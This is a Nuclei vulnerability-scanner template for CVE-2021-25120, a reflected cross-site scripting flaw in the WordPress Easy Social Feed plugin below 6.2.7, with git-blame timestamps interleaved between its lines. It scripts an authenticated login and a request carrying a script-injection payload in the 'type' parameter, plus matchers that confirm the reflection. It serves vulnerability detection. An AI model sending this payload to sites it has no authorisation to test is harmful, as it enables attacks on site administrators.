2022-04-21 21:16:41 +00:00
id : CVE-2021-25120
2022-02-19 11:38:31 +00:00
info :
2022-04-21 21:16:41 +00:00
name : Easy Social Feed < 6.2.7 - Cross-Site Scripting
2022-02-19 11:38:31 +00:00
author : dhiyaneshDk
severity : medium
2022-05-17 09:18:12 +00:00
description : Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
2022-04-21 21:16:41 +00:00
reference :
- https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
2022-05-17 09:18:12 +00:00
- https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25120
2022-04-21 21:16:41 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-04-21 21:16:41 +00:00
cve-id : CVE-2021-25120
2022-05-17 09:18:12 +00:00
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan
2022-02-19 11:38:31 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
2022-02-22 08:16:16 +00:00
GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1
2022-02-19 11:38:31 +00:00
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 08:16:16 +00:00
- "'type' : '</script><script>alert(document.domain)</script>'"
2022-02-19 11:38:31 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/21